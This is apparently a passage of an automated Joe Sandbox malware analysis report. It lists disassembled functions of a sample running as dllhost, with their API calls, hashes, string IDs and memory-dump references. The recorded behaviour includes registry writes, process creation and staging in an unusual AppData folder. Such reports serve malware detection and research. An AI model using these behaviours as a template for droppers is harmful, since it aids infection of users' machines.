                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                              • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                                              Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 756 4023de-40240f call 402c37 * 2 call 402cc7 763 402415-40241f 756->763 764 402abf-402ace 756->764 766 402421-40242e call 402c37 lstrlenW 763->766 767 402432-402435 763->767 766->767 768 402437-402448 call 402c15 767->768 769 402449-40244c 767->769 768->769 773 40245d-402471 RegSetValueExW 769->773 774 40244e-402458 call 4030fa 769->774 778 402473 773->778 779 402476-402557 RegCloseKey 773->779 774->773 778->779 779->764 781 402885-40288c 779->781 781->764
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                                                              • RegSetValueExW.KERNEL32 ref: 00402469
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValuelstrlen
                                                                              • String ID: sarcoderma
                                                                              • API String ID: 2655323295-3317469366
                                                                              • Opcode ID: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                                                              • Opcode Fuzzy Hash: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                                                              Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Enum
                                                                              • String ID:
                                                                              • API String ID: 464197530-0
                                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(?), ref: 00405BD6
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,00000000,000000F0), ref: 0040164D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 00401640
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                                                              • API String ID: 1892508949-2207628267
                                                                              • Opcode ID: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                                              • Opcode Fuzzy Hash: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                                              Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000800), ref: 00406160
                                                                              • RegCloseKey.KERNEL32(?), ref: 0040616B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: : Completed
                                                                              • API String ID: 3356406503-2954849223
                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                                              Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • CloseHandle.KERNEL32(?), ref: 00405867
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405844
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                                              Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                              • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                              Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                              • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                              Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                              • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                              Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                              • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                              Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                              • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                              Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                                              • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                                              Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
